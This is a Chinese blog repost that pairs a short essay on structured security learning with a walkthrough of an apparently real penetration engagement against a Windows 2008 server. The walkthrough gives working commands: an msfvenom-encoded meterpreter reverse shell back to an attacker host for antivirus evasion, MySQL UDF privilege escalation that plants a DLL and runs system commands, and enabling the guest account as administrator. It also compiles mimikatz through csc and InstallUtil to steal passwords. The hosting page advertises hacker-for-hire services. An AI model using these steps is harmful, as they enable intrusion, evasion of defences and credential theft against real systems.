当前位置:首页 > 黑客技术 > 正文内容

网络安全学习方法论之体系的重要性

访客4年前 (2021-04-09)黑客技术968

  前者的话:

  如果你分享的内容过于真实,你就没有发表机会,你要完全假了呢,又没有读者去看,你可以在这个通道里,真一会儿假一会儿地往前走,最重要的还是要往前走。

  ----Micropoor

  古人把一个职业的发展分为7个阶段,即:

  奴:自愿和靠人监督的人

  徒:能力不足,肯自愿学习的人

  工:老老实实,按规矩做事的人

  匠:精通一门技艺或手艺的人

  师:掌握了规律,又能将其传授给他人的人

  家:有固定的信念,让别人生活的更好的人

  圣:精通事理,通达万物的人

  那么网络安全学习也将会有阶段划分,我把它划分为10个阶段:

  1:问

  2:学

  3:动

  4:记

  5:体系

  6:问

  7:分享

  8:带队

  9:受业

  10:育才

  什么是体系?

  体系的本质是知识点的灵活串联与应用

  建立体系的过程?

  1:整理知识碎片化

  2:建立知识框架

  3:形成知识体系

  爱德加·戴尔提出了一套学习模型:模型主要分别为被动学习与主动学习的一个过程

  同时提出,学习效果在30%以下的几种传统方式,都是个人学习或被动学习;而学习效果在50%以上的,都是团队学习、主动学习和参与式学习。

  “输出”是最好的学习方式,“输出”的本质是体系重新结构化

  

  以上讲的是方法论,如何应用到实战中去?下例为实战

  一次普通的项目,做完后,却陈思很久,遂打算一气合成把整个流程记录下来,此篇再一次的叮嘱我:分享便是我最好的老师。

  ----Micropoor

  拿shell过程略过。(由于文章在项目实施结束形成,故部分无图或补图)

  windows 2008 r2 x64位 360主动+360卫士+360杀毒+waf,目标机仅支持aspx。运行OAWeb服务(.net+mssql),并且是内网中其他服务器的数据库服务器(mysql数据库,不支持php,无.net for mysql 驱动)

  

  端口开放如下:

  

  需要解决的第一个问题:payload

  由于目标机,安装某套装,payload一定是必须要解决的问题。当tasklist的时候,看到如下图几个进程的时候,第一反应就是需要做payload分离免杀。分离免杀主要分两大类,一类为第三方分离免杀,一类为自带安装分离免杀。文章中,采取了第三方分离免杀。

  

  本地补图(由于项目在实施后形成该文章,故本地靶机补图)

  目前的反病毒安全软件,常见有三种,一种基于特征,一种基于行为,一种基于云查杀。云查杀的特点基本也可以概括为特征查杀。无论是哪种,都是特别针对PE头文件的查杀。尤其是当payload文件越大的时候,特征越容易查杀。

  既然知道了目前的主流查杀方式,那么反制查杀,此篇采取特征与行为分离免杀。避免PE头文件,并且分离行为,与特征的综合免杀。适用于菜刀下等场景,也是我在基于windows下为了更稳定的一种常用手法。载入内存。

  

  这里的payload不采取生成pe文件,而采取shellcode方式,来借助第三方直接加载到内存中。避免行为:

  msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.5 lport=8080 -e x86/shikata_ga_nai -i 5 -f raw > test.c

  

  既然是shellcode方式的payload,那么需要借助第三方来启动,加载到内存。执行shellcode,自己写也不是很难,这里我借用一个github一个开源:

  作者的话:建议大家自己写shellcode执行盒,相关代码网上非常成熟。

  

  生成的payload大小如下:476字节。

  

  世界杀毒网:

  

  上线成功。

  

  而关于自带安装分离免杀,请参考我在公司Wiki上写的第六十九课时 payload分离免杀思路第二季

  payload反弹到vps的msf上,我的权限仅仅如下。

  

  需要解决的第二个问题:提权

  参考主机背景图,184个补丁,以及某套装。遂放弃了exp提权。

  原因1:需要更多的时间消耗在对反病毒软件对抗。

  原因2:目标机补丁过多。需要消耗更多的时间

  原因3:非常艰难的环境下,拿到了权限,不想因为某些exp导致蓝屏从而丢失权限。

  开始翻阅目标机上的文件,以及搜集目标机的端口,服务,启动等一系列信息。发现目标机安装mysql,并与内网其中一台建立大量连接。mysql版本为5.1.49-community-log

  下载目标机*..MYI,*.MYD,*.frm,加载于本地mysql。得到目标机root密码

  

  而目标机没有相关脚本环境连接mysql,到这里,可以有2个方向针对该问题作出解决

  一:转发目标机端口到本地,从而操作mysql。

  二:在非交互式下,完成mysql udf的提权。

  为了减少目标主机的流量探测,以及维护来之不易的session,故选择了第二种方案。非交互式下,mysql提权。

  命令行下,调用mysql是需要在启动一个mysql窗口,从而继续执行,而session下没有这样的条件。但mysql的 -e参数 作为直接执行sql语句,从而不另启动窗口。而-e需要注意的事项,use database。

  也就是所有参数需要mysql.xxxx

  

  如没有指定database,将会出现如下错误,而使用UNION,将不会有回显,一定出现问题,将会很难定位,故选择以mysql.x的方式指定。

  

  大致流程如下:

  mysql -uroot -pXXXXXX -e "create table mysql.a (cmd LONGBLOB);"

  mysql -uroot -pXXXXXX -e "insert into mysql.a (cmd) values (hex(load_file('D:\\XXXXXXXXXX\\mysql5\\lib\\plugin\?')));"

  mysql -uroot -pXXXXXX -e "SELECT unhex(cmd) FROM mysql.a INTO DUMPFILE 'D:/XXXXXXXXXX/mysql5/lib/plugin/uu.dll';"

  mysql -uroot -pXXXXXX -e "CREATE FUNCTION shell RETURNS STRING SONAME 'uu.dll'"

  mysql -uroot -pXXXXXX -e "select shell('cmd','whoami');"

  

  需要解决的第三个问题:登录服务器

  在有套装的环境下,默认拦截cmd下加帐号,而目前又无法抓取系统登录明文。mimikatz被查杀。cmd下调用powershell被拦截。遂选择激活guest帐号,并提升到administrators组,来临时登录目标机。

  

  

  socks代理登录目标机:

  

  需要解决的第四个问题:抓取目标机明文密码

  登录服务器后,目前依然不知道目标机的密码。这里有两种方向来解决该问题。

  一:关闭我能关闭的套装,由于管理员没有注销登录。能关闭的有限。

  二:分离免杀做mimikatz密码抓取

  作者选择了第二种方案:

  这里需要用到csc.exe,与InstallUtil.exe

  关于两个文件默认安装位置:(注意x32,x64区别)

  C:\Windows\Microsoft.NET\Framework\

  C:\Windows\Microsoft.NET\Framework64\

  C:\Windows\Microsoft.NET\Framework\

  C:\Windows\Microsoft.NET\Framework64\

  分别执行:

  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:Micropoor.exe /keyfile:C:\Users\Johnn\Desktop\installutil.snk /unsafe C:\Users\Johnn\Desktop\mimi.cs

  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile=/LogToConsole=false /U C:\Users\Johnn\Desktop\Micropoor.exe

  

  

  派生出的第五个问题:横向渗透

  关于第五个问题,本意并不是该篇幅所要讲述的,后续是搜集目标机的mssql,mysql,rdp密码。搜集所在内网的拓扑,来辅助本次的横向扩展。便完成了本次的项目。

  如需具体,请参考我在Wiki上的系列教程78,79,12,13,71课时。

  

  本次的整个流程,并没有遇到太多的问题,仅仅是把几个知识点的串联起来,形成的一个完整的渗透。也许你了解知识点1,也了解知识点2,还了解知识点3等等。但是一次完整的项目是离不开每一个知识点的串联与灵活运用。这应该是每一个信息安全从业人员值得思考的问题。

  在每次分享的同时,深深发现,原来分享,才是我最好的老师。

  网络安全亦正亦邪,初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田美池桑竹之属。别在初极狭便放弃这“人间正道”,错过这“土地平旷,屋舍俨然,有良田美池桑竹之属。”,愿每一位读者能找到自己能融合贯通的“武功”,在结合吞噬其他“招式”,如行云流水,石便是器,枝便是剑。

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:http://therlest.com/106486.html

分享给朋友:

“网络安全学习方法论之体系的重要性” 的相关文章

美团暗语「美团暗语2021」

 昨天,很多网友问小编美团暗语最好的方法是什么?有关美团暗语2021最好的方法是哪种?最新美团暗语2020?根据网民透露的审判细节这篇文章主要介绍了美团暗语,包括美团暗语 据大江网2021年10月20日17:01:48的最新消息,微博网友@ 爆料。 平安夜来临之际,事件,在网上炒得沸沸扬扬,引发全...

接单的黑客_可以找黑客黑美团吗

有在网络安全范畴中,猜测网络违法和歹意软件发展趋势好像现已成为了各大网络安全公司的传统了。 为了防止让咱们去阅览上百页的安全陈述,咱们专门整兼并总结了McAfee、Forrester、FiskIQ、卡巴斯基实验室【1、2、3】、WatchGuard、Nuvias、FireEye、CyberArk、F...

黑客了解,中国黑客越南网络apt,黑客网站密码破解工具

6.42 · hxxp[://]offlineearthquake[.]com/file//?id=&n=000 进程三:使命履行及实时数据剖析10.61 2019年6月19日,FireEye Endpoint Security设备上收到了缝隙检测警报。 违规应用程序被辨认为Microso...

Webshell安全检测篇

0x00 依据流量的检测办法 1.概述 笔者一直在重视webshell的安全剖析,最近就这段时刻的心得体会和咱们做个共享。 webshell一般有三种检测办法: 依据流量方法 依据agent方法(本质是直接剖析webshell文件) 依据日志剖析方法 Webshell的分...

如何查询酒店开房记录?谁可以查?网上怎么查?

关于酒店开房记录,这个基本上是看不到的,只有公检法系统(主要是公安局)才能查询的。如果你真想查询,要提供相关真实的身份证明,到公安局咨询,可能需要繁琐的手续。 2014年初,网上就有过“2000W开房数据泄露”的惊爆新闻,是因众多酒店使用了浙江慧达驿站公司开发的酒店Wi-Fi管理、认证系统,而该公司...

二手退役62军用望远镜(二手60倍望远镜转让)

并不是真正的军用级别产品,现在绝大部分,北京星河望远镜为您解答:我们,俺以前买过退役俄罗斯的,为满足全天侯使用要求开发成功的高密封。 需要望远镜。早期的军用望远镜,长时间看不头晕.平常旅游观景、如今已经推出军队服役,不会存在,尽管现在的光学技术水平有了很大提高。 宽带增透绿膜镜头,62式8X30望远...

评论列表

囤梦做啡
2年前 (2022-07-05)

驱动)    端口开放如下:    需要解决的第一个问题:payload  由于目标机,安装某套装,payload一定是必须要解决的问题。当tasklist的时候,看到如下图几个进程的时候,第一反

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。